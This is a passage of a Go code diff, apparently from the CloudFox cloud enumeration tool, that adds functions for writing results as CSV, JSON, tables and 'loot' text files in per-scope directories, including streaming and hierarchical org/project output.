baseCloudfoxModule) + } + } + for _, l := range dataToOutput.LootFiles() { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outDirectoryPath, "loot", l.Name+".txt")), baseCloudfoxModule) + } + + return nil +} + +// StreamFinalizeTables writes final tables line-by-line to avoid memory issues. +// It reads each .tmp file and writes it directly to a tab-delimited .txt table. 
+// Note: does not print a pretty table +// Uses the new directory structure: cloudfox-output/{CloudProvider}/{Principal}/{ScopeIdentifier}/ +func StreamFinalizeTables( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + header []string, +) error { + + // Build scope identifier using same logic as HandleOutputSmart + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Build consistent output path using NEW structure + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + // Ensure final table directory exists + tableDir := filepath.Join(outDirectoryPath, "table") + if err := os.MkdirAll(tableDir, 0o755); err != nil { + return fmt.Errorf("failed to create table directory: %w", err) + } + + // Walk the output directory looking for .tmp files + err := filepath.Walk(outDirectoryPath, func(tmpPath string, info os.FileInfo, err error) error { + if err != nil { + return err + } + if info.IsDir() || !strings.HasSuffix(info.Name(), ".tmp") { + return nil + } + + // Derive final table file name + baseName := strings.TrimSuffix(info.Name(), ".tmp") + tablePath := filepath.Join(tableDir, baseName+".txt") + + // Open output .txt for writing + outFile, err := os.OpenFile(tablePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return fmt.Errorf("failed to open final table file %s: %w", tablePath, err) + } + defer outFile.Close() + + // Write header row + if len(header) > 0 { + _, _ = fmt.Fprintln(outFile, strings.Join(header, "\t")) + } + + // Stream each row from .tmp file line-by-line + tmpFile, err := os.Open(tmpPath) + if err != nil { + return fmt.Errorf("failed to open tmp file %s: %w", tmpPath, err) + } + defer tmpFile.Close() + + scanner := bufio.NewScanner(tmpFile) + for scanner.Scan() { + line := 
scanner.Text() + cols := strings.Split(line, ",") + // Remove any ANSI color codes + cols = removeColorCodesFromSlice(cols) + _, _ = fmt.Fprintln(outFile, strings.Join(cols, "\t")) + } + if scanErr := scanner.Err(); scanErr != nil { + return fmt.Errorf("error scanning tmp file %s: %w", tmpPath, scanErr) + } + + // Delete the temporary .tmp file after streaming + _ = os.Remove(tmpPath) + + return nil + }) + + return err +} + +// streamRenderTableWithHeader renders a tmp file into a table with a single header row. +func streamRenderTableWithHeader(tmpFilePath string, header []string, outFile *os.File, wrap bool) error { + t := table.New(outFile) + if !wrap { + t.SetColumnMaxWidth(1000) + } + + if len(header) > 0 { + t.SetHeaders(header...) + } + + t.SetRowLines(false) + t.SetDividers(table.UnicodeRoundedDividers) + t.SetAlignment(table.AlignLeft) + t.SetHeaderStyle(table.StyleBold) + + // Stream rows from tmp file + f, err := os.Open(tmpFilePath) + if err != nil { + return err + } + defer f.Close() + + scanner := bufio.NewScanner(f) + for scanner.Scan() { + line := scanner.Text() + row := strings.Split(line, ",") + t.AddRow(row...) 
+ } + if err := scanner.Err(); err != nil { + return err + } + + t.Render() + return nil +} + +func AppendCSV(outputDir string, table TableFile) error { + csvDir := filepath.Join(outputDir, "csv") + if err := os.MkdirAll(csvDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(csvDir, table.Name+".csv") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + writer := csv.NewWriter(f) + // Only write header if file is new + info, err := f.Stat() + if err != nil { + return err + } + if info.Size() == 0 { + if err := writer.Write(table.Header); err != nil { + return err + } + } + + for _, row := range table.Body { + row = removeColorCodesFromSlice(row) + if err := writer.Write(row); err != nil { + return err + } + } + writer.Flush() + return writer.Error() +} + +func AppendLoot(outputDir string, loot LootFile) error { + lootDir := filepath.Join(outputDir, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(lootDir, loot.Name+".txt") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + if _, err := f.WriteString(loot.Contents + "\n"); err != nil { + return err + } + return nil +} + +func AppendJSON(outputDir string, table TableFile) error { + jsonDir := filepath.Join(outputDir, "json") + if err := os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(jsonDir, table.Name+".json") + var existing []map[string]string + + // Try to load existing JSON if file exists + if _, err := os.Stat(filePath); err == nil { + data, err := os.ReadFile(filePath) + if err != nil { + return err + } + if len(data) > 0 { + if err := json.Unmarshal(data, &existing); err != nil { + return err + } + } + } + + // Append new rows + for _, row := range table.Body { + rowMap := make(map[string]string) + for i, col := range row { + 
rowMap[table.Header[i]] = col + } + existing = append(existing, rowMap) + } + + jsonBytes, err := json.MarshalIndent(existing, "", " ") + if err != nil { + return err + } + + return os.WriteFile(filePath, jsonBytes, 0644) +} + +func AppendJSONL(outputDir string, table TableFile) error { + jsonDir := filepath.Join(outputDir, "json") + if err := os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + + filePath := filepath.Join(jsonDir, table.Name+".jsonl") + f, err := os.OpenFile(filePath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return err + } + defer f.Close() + + for _, row := range table.Body { + rowMap := make(map[string]string) + for i, col := range row { + rowMap[table.Header[i]] = col + } + jsonBytes, _ := json.Marshal(rowMap) + if _, err := f.Write(append(jsonBytes, '\n')); err != nil { + return err + } + } + + return nil +} + +func AppendLootFile(outputDirectory, lootFileName, entry string) error { + // Ensure output directory exists + lootDir := filepath.Join(outputDirectory, "loot") + if err := os.MkdirAll(lootDir, 0755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + // Loot file path + lootPath := filepath.Join(lootDir, fmt.Sprintf("%s.txt", lootFileName)) + + // Lock so concurrent workers don't clobber each other + lootFileMu.Lock() + defer lootFileMu.Unlock() + + // Open in append mode + f, err := os.OpenFile(lootPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open loot file: %w", err) + } + defer f.Close() + + // Write entry with newline + if _, err := f.WriteString(entry + "\n"); err != nil { + return fmt.Errorf("failed to write to loot file: %w", err) + } + + return nil +} + func removeColorCodes(input string) string { // Regular expression to match ANSI color codes ansiRegExp := regexp.MustCompile(`\x1b\[[0-9;]*m`) @@ -425,28 +863,6 @@ func (b *TableClient) createJSONFiles() { } } -// func (b *TableClient) writeJSONFiles() []string { 
-// var fullFilePaths []string - -// for _, file := range b.TableFiles { -// file.Body = removeColorCodesFromNestedSlice(file.Body) -// jsonBytes, err := json.Marshal(file.Body) -// if err != nil { -// log.Fatalf("error marshalling json: %s", err) -// } - -// _, err = file.JSONFilePointer.Write(jsonBytes) -// if err != nil { -// log.Fatalf("error writing json: %s", err) -// } - -// fullPath := path.Join(b.DirectoryName, "json", fmt.Sprintf("%s.json", file.Name)) -// fullFilePaths = append(fullFilePaths, fullPath) -// } - -// return fullFilePaths -// } - func (b *TableClient) writeJSONFiles() []string { var fullFilePaths []string @@ -518,3 +934,1049 @@ func WriteJsonlFile(file *os.File, data interface{}) error { } return nil } + +func sanitizeFileName(name string) string { + // replace / and \ with _ + re := regexp.MustCompile(`[\\/]+`) + return re.ReplaceAllString(name, "_") +} + +// ============================================================================ +// NEW OUTPUT FUNCTIONS V2 - Multi-cloud support with intelligent routing +// ============================================================================ + +// HandleOutputV2 is the new generic output function that supports multi-cloud +// environments (Azure, AWS, GCP) with proper scope handling. +// This function provides a cleaner directory structure based on scope type. 
+// +// Directory structure: +// - Azure (tenant mode): cloudfox-output/Azure/{UPN}/{TenantName}/module.csv +// - Azure (subscription mode): cloudfox-output/Azure/{UPN}/{SubscriptionName}/module.csv +// - AWS (org mode): cloudfox-output/AWS/{Principal}/{OrgID}/module.csv +// - AWS (account mode): cloudfox-output/AWS/{Principal}/{AccountName}/module.csv +// - GCP (org mode): cloudfox-output/GCP/{Principal}/{OrgID}/module.csv +// - GCP (project mode): cloudfox-output/GCP/{Principal}/{ProjectName}/module.csv +func HandleOutputV2( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, // "tenant", "subscription", "organization", "account", "project" + scopeIdentifiers []string, // Tenant IDs, Subscription IDs, Account IDs, Project IDs + scopeNames []string, // Friendly names for scopes + principal string, // UPN or IAM user + dataToOutput CloudfoxOutput, +) error { + // Build the results identifier based on scope + resultsIdentifier := buildResultsIdentifier(scopeType, scopeIdentifiers, scopeNames) + + // Build output directory path with new structure + // Format: cloudfox-output/{CloudProvider}/{Principal}/{ResultsIdentifier}/ + outDirectoryPath := filepath.Join( + outputDirectory, + "cloudfox-output", + cloudProvider, + principal, + resultsIdentifier, + ) + + tables := dataToOutput.TableFiles() + lootFiles := dataToOutput.LootFiles() + + // Determine base module name from first table file (for backwards compatibility) + baseCloudfoxModule := "" + if len(tables) > 0 { + baseCloudfoxModule = tables[0].Name + } + + outputClient := OutputClient{ + Verbosity: verbosity, + CallingModule: baseCloudfoxModule, + Table: TableClient{ + Wrap: wrap, + DirectoryName: outDirectoryPath, + TableFiles: tables, + }, + Loot: LootClient{ + DirectoryName: outDirectoryPath, + LootFiles: lootFiles, + }, + } + + // Handle output based on the verbosity level + outputClient.WriteFullOutput(tables, lootFiles) + return nil +} + +// 
HandleOutputSmart automatically selects the best output method based on dataset size. +// This is the RECOMMENDED function for all modules to use. +// +// Decision thresholds: +// - < 50,000 rows: Uses HandleOutputV2 (normal in-memory) +// - >= 50,000 rows: Uses HandleStreamingOutput (memory-efficient streaming) +// - >= 500,000 rows: Logs warning about large dataset +// - >= 1,000,000 rows: Logs critical warning, suggests optimization flags +func HandleOutputSmart( + cloudProvider string, + format string, + outputDirectory string, + verbosity int, + wrap bool, + scopeType string, + scopeIdentifiers []string, + scopeNames []string, + principal string, + dataToOutput CloudfoxOutput, +) error { + logger := NewLogger() + + // Count total rows across all table files + totalRows := 0 + for _, tableFile := range dataToOutput.TableFiles() { + totalRows += len(tableFile.Body) + } + + // Log dataset size if verbose + if verbosity >= 2 { + logger.InfoM(fmt.Sprintf("Dataset size: %s rows", formatNumberWithCommas(totalRows)), "output") + } + + // Decision tree based on row count + if totalRows >= 1000000 { + logger.InfoM(fmt.Sprintf("WARNING: Very large dataset detected (%s rows). Consider using per-scope flags for better performance.", + formatNumberWithCommas(totalRows)), "output") + } else if totalRows >= 500000 { + logger.InfoM(fmt.Sprintf("WARNING: Large dataset detected (%s rows). 
Using streaming output.", + formatNumberWithCommas(totalRows)), "output") + } + + // Auto-select output method based on dataset size + if totalRows >= 50000 { + if verbosity >= 1 { + logger.InfoM(fmt.Sprintf("Using streaming output for memory efficiency (%s rows)", + formatNumberWithCommas(totalRows)), "output") + } + + // Use streaming output for large datasets (new signature) + return HandleStreamingOutput( + cloudProvider, + format, + outputDirectory, + verbosity, + wrap, + scopeType, + scopeIdentifiers, + scopeNames, + principal, + dataToOutput, + ) + } + + // Use normal in-memory output for smaller datasets + return HandleOutputV2( + cloudProvider, + format, + outputDirectory, + verbosity, + wrap, + scopeType, + scopeIdentifiers, + scopeNames, + principal, + dataToOutput, + ) +} + +// buildResultsIdentifier creates a results identifier from scope information. +// It prefers friendly names over IDs for better readability. +// +// Fallback hierarchy: +// - Azure: Tenant Name → Tenant GUID → Subscription Name → Subscription GUID +// - AWS: Org Name → Org ID → Account Alias → Account ID +// - GCP: Org Name → Org ID → Project Name → Project ID +// +// Directory Naming Convention: +// - Tenant-level: [T]{TenantName} or [T]{TenantGUID} +// - Subscription-level: [S]{SubscriptionName} or [S]{SubscriptionGUID} +// - Organization-level: [O]{OrgName} or [O]{OrgID} +// - Account-level: [A]{AccountName} or [A]{AccountID} +// - Project-level: [P]{ProjectName} or [P]{ProjectID} +// +// Multi-scope handling: +// - Single scope: [P]{ProjectName} +// - Multiple scopes: [P]{FirstName}_and_{N-1}_more +func buildResultsIdentifier(scopeType string, identifiers, names []string) string { + var rawName string + + // Prefer friendly name if available + if len(names) > 0 && names[0] != "" { + rawName = names[0] + } else if len(identifiers) > 0 && identifiers[0] != "" { + // Fallback to identifier + rawName = identifiers[0] + } else { + // Ultimate fallback + rawName = 
"unknown-scope" + } + + // Handle multiple scopes - indicate how many additional scopes are included + // This helps users understand that the folder contains data from multiple projects/accounts + if len(identifiers) > 1 { + rawName = fmt.Sprintf("%s_and_%d_more", rawName, len(identifiers)-1) + } + + // Sanitize the name for Windows/Linux compatibility + sanitizedName := sanitizeDirectoryName(rawName) + + // Add scope prefix based on scope type + prefix := getScopePrefix(scopeType) + if prefix != "" { + return prefix + sanitizedName + } + + return sanitizedName +} + +// getScopePrefix returns the appropriate prefix for a given scope type +func getScopePrefix(scopeType string) string { + switch scopeType { + case "tenant": + return "[T]" + case "subscription": + return "[S]" + case "organization": + return "[O]" + case "account": + return "[A]" + case "project": + return "[P]" + default: + return "" + } +} + +// sanitizeDirectoryName removes or replaces characters that are invalid in Windows/Linux directory names +// Invalid characters: < > : " / \ | ? * +// Also trims leading/trailing spaces and dots (Windows restriction) +func sanitizeDirectoryName(name string) string { + // Replace invalid characters with underscore + invalidChars := []string{"<", ">", ":", "\"", "/", "\\", "|", "?", "*"} + sanitized := name + for _, char := range invalidChars { + sanitized = strings.ReplaceAll(sanitized, char, "_") + } + + // Trim leading/trailing spaces and dots (Windows doesn't allow these) + sanitized = strings.Trim(sanitized, " .") + + // If the name is empty after sanitization, use a default + if sanitized == "" { + sanitized = "unnamed" + } + + return sanitized +} + +// formatNumberWithCommas formats a number with comma separators for readability. 
+// Example: 1000000 -> "1,000,000" +func formatNumberWithCommas(n int) string { + // Convert to string + s := fmt.Sprintf("%d", n) + + // Handle negative numbers + negative := false + if s[0] == '-' { + negative = true + s = s[1:] + } + + // Add commas every 3 digits from right + var result []rune + for i, digit := range s { + if i > 0 && (len(s)-i)%3 == 0 { + result = append(result, ',') + } + result = append(result, digit) + } + + if negative { + return "-" + string(result) + } + return string(result) +} + +// ============================================================================ +// HIERARCHICAL OUTPUT FUNCTIONS - GCP multi-project support +// ============================================================================ + +// HierarchicalOutputData represents output data organized by scope for hierarchical output +type HierarchicalOutputData struct { + OrgLevelData map[string]CloudfoxOutput // orgID -> org-level data + FolderLevelData map[string]CloudfoxOutput // folderID -> folder-level data + ProjectLevelData map[string]CloudfoxOutput // projectID -> project data +} + +// PathBuilder is a function type that builds output paths for hierarchical output +// This allows the caller to inject their path-building logic without importing internal/gcp +type PathBuilder func(scopeType string, scopeID string) string + +// HandleHierarchicalOutput writes data to hierarchical directory structure. +// This function outputs data per-scope (organization and/or project) rather than aggregating all data. 
+// +// Directory structure: +// - Org level: baseDir/gcp/principal/[O]org-name/module.csv +// - Project under org: baseDir/gcp/principal/[O]org-name/[P]project-name/module.csv +// - Standalone project: baseDir/gcp/principal/[P]project-name/module.csv +// +// Parameters: +// - cloudProvider: "gcp" (or other cloud providers in future) +// - format: Output format ("all", "csv", "json", "table") +// - verbosity: Verbosity level for console output +// - wrap: Whether to wrap table output +// - pathBuilder: Function that returns the output path for a given scope +// - outputData: Data organized by scope (org-level and project-level maps) +func HandleHierarchicalOutput( + cloudProvider string, + format string, + verbosity int, + wrap bool, + pathBuilder PathBuilder, + outputData HierarchicalOutputData, +) error { + logger := NewLogger() + + // Write org-level data (if any) + for orgID, orgData := range outputData.OrgLevelData { + outPath := pathBuilder("organization", orgID) + if err := writeOutputToPath(outPath, format, verbosity, wrap, orgData, logger); err != nil { + return fmt.Errorf("failed to write org-level output for %s: %w", orgID, err) + } + } + + // Write folder-level data (if any) + for folderID, folderData := range outputData.FolderLevelData { + outPath := pathBuilder("folder", folderID) + if err := writeOutputToPath(outPath, format, verbosity, wrap, folderData, logger); err != nil { + return fmt.Errorf("failed to write folder-level output for %s: %w", folderID, err) + } + } + + // Write project-level data + for projectID, projectData := range outputData.ProjectLevelData { + outPath := pathBuilder("project", projectID) + if err := writeOutputToPath(outPath, format, verbosity, wrap, projectData, logger); err != nil { + return fmt.Errorf("failed to write project-level output for %s: %w", projectID, err) + } + } + + return nil +} + +// writeOutputToPath writes CloudfoxOutput data to a specific path +func writeOutputToPath(outPath string, format string, 
verbosity int, wrap bool, data CloudfoxOutput, logger Logger) error { + tables := data.TableFiles() + lootFiles := data.LootFiles() + + // Determine base module name from first table file (for logging) + baseCloudfoxModule := "" + if len(tables) > 0 { + baseCloudfoxModule = tables[0].Name + } + + outputClient := OutputClient{ + Verbosity: verbosity, + CallingModule: baseCloudfoxModule, + Table: TableClient{ + Wrap: wrap, + DirectoryName: outPath, + TableFiles: tables, + }, + Loot: LootClient{ + DirectoryName: outPath, + LootFiles: lootFiles, + }, + } + + // Handle output based on the verbosity level + outputClient.WriteFullOutput(tables, lootFiles) + return nil +} + +// HandleHierarchicalOutputStreaming writes data to hierarchical directory structure using streaming. +// This is the memory-efficient version for large datasets. +// +// Parameters are the same as HandleHierarchicalOutput but uses streaming internally. +func HandleHierarchicalOutputStreaming( + cloudProvider string, + format string, + verbosity int, + wrap bool, + pathBuilder PathBuilder, + outputData HierarchicalOutputData, +) error { + logger := NewLogger() + + // Stream org-level data (if any) + for orgID, orgData := range outputData.OrgLevelData { + outPath := pathBuilder("organization", orgID) + if err := streamOutputToPath(outPath, format, verbosity, wrap, orgData, logger); err != nil { + return fmt.Errorf("failed to stream org-level output for %s: %w", orgID, err) + } + } + + // Stream folder-level data (if any) + for folderID, folderData := range outputData.FolderLevelData { + outPath := pathBuilder("folder", folderID) + if err := streamOutputToPath(outPath, format, verbosity, wrap, folderData, logger); err != nil { + return fmt.Errorf("failed to stream folder-level output for %s: %w", folderID, err) + } + } + + // Stream project-level data + for projectID, projectData := range outputData.ProjectLevelData { + outPath := pathBuilder("project", projectID) + if err := streamOutputToPath(outPath, 
format, verbosity, wrap, projectData, logger); err != nil { + return fmt.Errorf("failed to stream project-level output for %s: %w", projectID, err) + } + } + + return nil +} + +// streamOutputToPath streams CloudfoxOutput data to a specific path +func streamOutputToPath(outPath string, format string, verbosity int, wrap bool, data CloudfoxOutput, logger Logger) error { + if err := os.MkdirAll(outPath, 0o755); err != nil { + return fmt.Errorf("failed to create output directory: %w", err) + } + + // Determine base module name from first table file (for logging) + baseCloudfoxModule := "" + if len(data.TableFiles()) > 0 { + baseCloudfoxModule = data.TableFiles()[0].Name + } + + // Stream table files + for _, t := range data.TableFiles() { + if verbosity > 0 { + tmpClient := TableClient{Wrap: wrap} + tmpClient.printTablesToScreen([]TableFile{t}) + } + + safeName := sanitizeFileName(t.Name) + + // Stream CSV rows + if format == "all" || format == "csv" { + csvPath := filepath.Join(outPath, "csv", safeName+".csv") + if err := os.MkdirAll(filepath.Dir(csvPath), 0o755); err != nil { + return fmt.Errorf("failed to create csv directory: %w", err) + } + csvFile, err := os.OpenFile(csvPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open csv file: %w", err) + } + + info, _ := csvFile.Stat() + if info.Size() == 0 { + _, _ = csvFile.WriteString(strings.Join(t.Header, ",") + "\n") + } + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + _, _ = csvFile.WriteString(strings.Join(cleanRow, ",") + "\n") + } + csvFile.Close() + + logger.InfoM(fmt.Sprintf("Output written to %s", csvPath), baseCloudfoxModule) + } + + // Stream JSONL rows + if format == "all" || format == "json" { + if err := AppendJSONL(outPath, t); err != nil { + return fmt.Errorf("failed to append JSONL: %w", err) + } + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(outPath, "json", safeName+".jsonl")), baseCloudfoxModule) + } + + 
// Stream table rows + if format == "all" || format == "table" { + tableDir := filepath.Join(outPath, "table") + if err := os.MkdirAll(tableDir, 0o755); err != nil { + return fmt.Errorf("failed to create table directory: %w", err) + } + tablePath := filepath.Join(tableDir, safeName+".txt") + + tableFile, err := os.OpenFile(tablePath, os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return fmt.Errorf("failed to open table file: %w", err) + } + + // Write tab-delimited data + _, _ = fmt.Fprintln(tableFile, strings.Join(t.Header, "\t")) + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + _, _ = fmt.Fprintln(tableFile, strings.Join(cleanRow, "\t")) + } + tableFile.Close() + + logger.InfoM(fmt.Sprintf("Output written to %s", tablePath), baseCloudfoxModule) + } + } + + // Stream loot files + for _, l := range data.LootFiles() { + lootDir := filepath.Join(outPath, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + lootPath := filepath.Join(lootDir, l.Name+".txt") + lootFile, err := os.OpenFile(lootPath, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644) + if err != nil { + return fmt.Errorf("failed to open loot file: %w", err) + } + + scanner := bufio.NewScanner(strings.NewReader(l.Contents)) + for scanner.Scan() { + if _, err := lootFile.WriteString(scanner.Text() + "\n"); err != nil { + lootFile.Close() + return fmt.Errorf("failed to append loot line: %w", err) + } + } + lootFile.Close() + + if err := scanner.Err(); err != nil { + return fmt.Errorf("error reading loot lines: %w", err) + } + + logger.InfoM(fmt.Sprintf("Output written to %s", lootPath), baseCloudfoxModule) + } + + return nil +} + +// HandleHierarchicalOutputSmart automatically selects the best output method based on dataset size. +// This is the RECOMMENDED function for hierarchical output. 
+func HandleHierarchicalOutputSmart( + cloudProvider string, + format string, + verbosity int, + wrap bool, + pathBuilder PathBuilder, + outputData HierarchicalOutputData, +) error { + logger := NewLogger() + + // Count total rows across all data + totalRows := 0 + for _, orgData := range outputData.OrgLevelData { + for _, tableFile := range orgData.TableFiles() { + totalRows += len(tableFile.Body) + } + } + for _, folderData := range outputData.FolderLevelData { + for _, tableFile := range folderData.TableFiles() { + totalRows += len(tableFile.Body) + } + } + for _, projectData := range outputData.ProjectLevelData { + for _, tableFile := range projectData.TableFiles() { + totalRows += len(tableFile.Body) + } + } + + // Log dataset size if verbose + if verbosity >= 2 { + logger.InfoM(fmt.Sprintf("Hierarchical output - Total dataset size: %s rows", formatNumberWithCommas(totalRows)), "output") + } + + // Decision tree based on row count + if totalRows >= 1000000 { + logger.InfoM(fmt.Sprintf("WARNING: Very large dataset detected (%s rows). Using streaming output.", + formatNumberWithCommas(totalRows)), "output") + } else if totalRows >= 500000 { + logger.InfoM(fmt.Sprintf("Large dataset detected (%s rows). 
Using streaming output.", + formatNumberWithCommas(totalRows)), "output") + } + + // Auto-select output method based on dataset size + if totalRows >= 50000 { + if verbosity >= 1 { + logger.InfoM(fmt.Sprintf("Using streaming hierarchical output for memory efficiency (%s rows)", + formatNumberWithCommas(totalRows)), "output") + } + return HandleHierarchicalOutputStreaming(cloudProvider, format, verbosity, wrap, pathBuilder, outputData) + } + + // Use normal in-memory output for smaller datasets + return HandleHierarchicalOutput(cloudProvider, format, verbosity, wrap, pathBuilder, outputData) +} + +// ============================================================================ +// SINGLE-PASS TEE STREAMING - Efficient hierarchical output with row routing +// ============================================================================ + +// RowRouter is a function that determines which project IDs a row belongs to. +// Given a row (slice of strings), it returns the project IDs that should receive this row. +// The row is always written to org-level; this determines additional project-level routing. +type RowRouter func(row []string) []string + +// ProjectLootCollector is a function that returns loot files for a specific project. +// This allows modules to provide inheritance-aware loot (e.g., org + folder + project loot). +type ProjectLootCollector func(projectID string) []LootFile + +// TeeStreamingConfig holds configuration for single-pass tee streaming output +type TeeStreamingConfig struct { + // OrgID is the organization ID for org-level output + OrgID string + + // ProjectIDs is the list of all project IDs that may receive output + ProjectIDs []string + + // Tables contains the table data to stream (header + body) + Tables []TableFile + + // LootFiles contains loot files to write to org level + LootFiles []LootFile + + // ProjectLootCollector returns loot files for a specific project (with inheritance). + // If nil, no loot is written to project directories. 
+ ProjectLootCollector ProjectLootCollector + + // RowRouter determines which projects each row belongs to + // If nil, rows are only written to org level + RowRouter RowRouter + + // PathBuilder builds output paths for each scope + PathBuilder PathBuilder + + // Format is the output format ("all", "csv", "json", "table") + Format string + + // Verbosity level for console output + Verbosity int + + // Wrap enables table wrapping + Wrap bool +} + +// teeStreamWriter manages multiple output file handles for tee streaming +type teeStreamWriter struct { + // orgWriters holds file writers for org-level output (format -> file) + orgCSV *os.File + orgJSON *os.File + orgTable *os.File + + // projectWriters holds file writers for each project (projectID -> format -> file) + projectCSV map[string]*os.File + projectJSON map[string]*os.File + projectTable map[string]*os.File + + // Track which projects have had headers written + projectHeaderWritten map[string]bool + + // Configuration + format string + outPath string +} + +// HandleHierarchicalOutputTee performs single-pass streaming with tee to multiple outputs. +// This is the most efficient method for large datasets that need both org-level and per-project output. +// +// Instead of streaming org data first, then streaming each project's filtered data separately, +// this function streams through the data once and writes each row to: +// 1. The org-level output (always) +// 2. Any project-level outputs determined by the RowRouter function +// +// This reduces I/O and processing time significantly for large datasets. 
+func HandleHierarchicalOutputTee(config TeeStreamingConfig) error { + logger := NewLogger() + + if config.OrgID == "" { + return fmt.Errorf("OrgID is required for tee streaming") + } + + // Get base module name for logging + baseCloudfoxModule := "" + if len(config.Tables) > 0 { + baseCloudfoxModule = config.Tables[0].Name + } + + // Build output paths + orgPath := config.PathBuilder("organization", config.OrgID) + projectPaths := make(map[string]string) + for _, projectID := range config.ProjectIDs { + projectPaths[projectID] = config.PathBuilder("project", projectID) + } + + // Track which projects received data (for loot file generation) + projectsWithData := make(map[string]bool) + + // Process each table + for _, t := range config.Tables { + if config.Verbosity > 0 { + tmpClient := TableClient{Wrap: config.Wrap} + tmpClient.printTablesToScreen([]TableFile{t}) + } + + safeName := sanitizeFileName(t.Name) + + // Initialize writers + writer := &teeStreamWriter{ + projectCSV: make(map[string]*os.File), + projectJSON: make(map[string]*os.File), + projectTable: make(map[string]*os.File), + projectHeaderWritten: make(map[string]bool), + format: config.Format, + } + + // Open org-level files + if err := writer.openOrgFiles(orgPath, safeName, config.Format); err != nil { + return fmt.Errorf("failed to open org files: %w", err) + } + + // Write org-level headers + if err := writer.writeOrgHeader(t.Header, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to write org header: %w", err) + } + + // Pre-open project files if we have a router + if config.RowRouter != nil { + for projectID, projectPath := range projectPaths { + if err := writer.openProjectFiles(projectID, projectPath, safeName, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to open project files for %s: %w", projectID, err) + } + } + } + + // Stream each row + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + + // Always write 
to org level + if err := writer.writeOrgRow(cleanRow, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to write org row: %w", err) + } + + // Route to projects if router is configured + if config.RowRouter != nil { + targetProjects := config.RowRouter(row) + for _, projectID := range targetProjects { + // Track that this project has data + projectsWithData[projectID] = true + + // Write header if this is the first row for this project + if !writer.projectHeaderWritten[projectID] { + if err := writer.writeProjectHeader(projectID, t.Header, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to write project header for %s: %w", projectID, err) + } + writer.projectHeaderWritten[projectID] = true + } + + if err := writer.writeProjectRow(projectID, cleanRow, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to write project row for %s: %w", projectID, err) + } + } + } + } + + // Close all files + writer.closeAll() + + // Log output paths + if config.Format == "all" || config.Format == "csv" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(orgPath, "csv", safeName+".csv")), baseCloudfoxModule) + } + if config.Format == "all" || config.Format == "json" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(orgPath, "json", safeName+".jsonl")), baseCloudfoxModule) + } + if config.Format == "all" || config.Format == "table" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(orgPath, "table", safeName+".txt")), baseCloudfoxModule) + } + + // Log project outputs (only for projects that received data) + for projectID := range writer.projectHeaderWritten { + projectPath := projectPaths[projectID] + if config.Format == "all" || config.Format == "csv" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(projectPath, "csv", safeName+".csv")), baseCloudfoxModule) + } + if config.Format == "all" || config.Format == "json" { + 
logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(projectPath, "json", safeName+".jsonl")), baseCloudfoxModule) + } + if config.Format == "all" || config.Format == "table" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(projectPath, "table", safeName+".txt")), baseCloudfoxModule) + } + } + } + + // Write loot files to org level + for _, l := range config.LootFiles { + lootDir := filepath.Join(orgPath, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + lootPath := filepath.Join(lootDir, l.Name+".txt") + if err := os.WriteFile(lootPath, []byte(l.Contents), 0644); err != nil { + return fmt.Errorf("failed to write loot file: %w", err) + } + + logger.InfoM(fmt.Sprintf("Output written to %s", lootPath), baseCloudfoxModule) + } + + // Write per-project loot files (with inheritance) if collector is provided + if config.ProjectLootCollector != nil { + for projectID := range projectsWithData { + projectPath := projectPaths[projectID] + projectLootFiles := config.ProjectLootCollector(projectID) + + for _, l := range projectLootFiles { + lootDir := filepath.Join(projectPath, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return fmt.Errorf("failed to create project loot directory: %w", err) + } + + lootPath := filepath.Join(lootDir, l.Name+".txt") + if err := os.WriteFile(lootPath, []byte(l.Contents), 0644); err != nil { + return fmt.Errorf("failed to write project loot file: %w", err) + } + + logger.InfoM(fmt.Sprintf("Output written to %s", lootPath), baseCloudfoxModule) + } + } + } + + return nil +} + +// openOrgFiles opens output files for org-level output +func (w *teeStreamWriter) openOrgFiles(orgPath, safeName, format 